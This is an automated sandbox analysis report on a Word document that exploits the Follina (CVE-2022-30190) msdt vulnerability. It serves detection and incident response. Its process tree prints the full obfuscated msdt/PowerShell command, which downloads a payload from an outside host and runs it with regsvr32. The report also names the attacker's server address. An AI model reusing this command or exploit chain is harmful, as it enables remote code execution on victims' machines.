Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc1712.docx

Overview

General Information

Sample Name:doc1712.docx
Analysis ID:640804
MD5:7a91b01a037ccbfe6589161643d0a65a
SHA1:53658a5b5bc577d601e23ae77a34cb44dcba1f27
SHA256:f17f5c8eac3a18c961705a61385e1d2894cc8f22fb33aa3e076a40b826384c60
Infos:

Detection

Follina CVE-2022-30190
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Drops PE files to the windows directory (C:\Windows)
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5184 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 6040 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 6552 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 6332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 5160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6868 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster MD5: 426E7499F6A7346F0410DEAD0805586B)
  • csc.exe (PID: 1500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x1ccc:$sa1: msdt.exe
        • 0x1d08:$sa1: msdt.exe
        • 0x2252:$sa1: msdt.exe
        • 0x39cd:$sa1: msdt.exe
        • 0x1dda:$sb2: IT_BrowseForFile=
        • 0x3a36:$sb2: IT_BrowseForFile=
        00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x40ec:$sa1: msdt.exe
        • 0x5388:$sa1: msdt.exe
        • 0x18cb6:$sa1: msdt.exe
        • 0x26bfa:$sb2: IT_BrowseForFile=
        00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x2320:$sa1: msdt.exe
        • 0x235c:$sa1: msdt.exe
        • 0x28a6:$sa1: msdt.exe
        • 0x242e:$sb2: IT_BrowseForFile=
        00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x28c8:$sa1: msdt.exe
        • 0x2996:$sb2: IT_BrowseForFile=
        Process Memory Space: msdt.exe PID: 6552SUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190Nasreddine Bencherchali, Christian Burkard
        • 0x5de0:$sa1: msdt.exe
        • 0x5eef:$sa1: msdt.exe
        • 0x7adf:$sa1: msdt.exe
        • 0xb6fc:$sa1: msdt.exe
        • 0xe6b2:$sa1: msdt.exe
        • 0x1159c:$sa1: msdt.exe
        • 0x1704c:$sa1: msdt.exe
        • 0x1a002:$sa1: msdt.exe
        • 0x20479:$sa1: msdt.exe
        • 0x2342f:$sa1: msdt.exe
        • 0x2dfc5:$sa1: msdt.exe
        • 0x30f7b:$sa1: msdt.exe
        • 0x39bc5:$sa1: msdt.exe
        • 0x42747:$sa1: msdt.exe
        • 0x47119:$sa1: msdt.exe
        • 0x4a0cf:$sa1: msdt.exe
        • 0x4d745:$sa1: msdt.exe
        • 0x4e858:$sa1: msdt.exe
        • 0x4e860:$sa1: msdt.exe
        • 0x4e868:$sa1: msdt.exe
        • 0x4fa44:$sa1: msdt.exe

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:45.32.185.177192.168.2.2280491762036726 06/07/22-17:33:41.296228
        SID:2036726
        Source Port:80
        Destination Port:49176
        Protocol:TCP
        Classtype:Attempted User Privilege Gain

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: doc1712.docxVirustotal: Detection: 23%Perma Link

        Exploits

        barindex
        Yara detected Microsoft Office Exploit Follina CVE-2022-30190
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPED
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

        Software Vulnerabilities

        barindex
        Document exploit detected (process start blacklist hit)
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.5:49754 -> 45.32.185.177:80
        Source: global trafficTCP traffic: 192.168.2.5:49765 -> 45.32.185.177:80

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 45.32.185.177:80 -> 192.168.2.22:49176
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 45.32.185.177If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMTIf-None-Match: "1701-5e0db72a43821"Connection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: unknownTCP traffic detected without corresponding DNS query: 45.32.185.177
        Source: ~WRS{99114F2D-2DF9-4F1D-B87F-44944CA06DB2}.tmp.0.drString found in binary or memory: http://45.32.185.177:80/123.RES
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: msdt.exe, 00000009.00000002.730185896.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.aadrm.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.cortana.ai
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.office.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.onedrive.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://augloop.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cdn.entity.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://config.edge.skype.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cortana.ai
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cortana.ai/api
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://cr.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dataservice.o365filtering.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dataservice.o365filtering.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dev.cortana.ai
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://devnull.onenote.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://directory.services.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://graph.ppe.windows.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://graph.ppe.windows.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://graph.windows.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://graph.windows.net/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
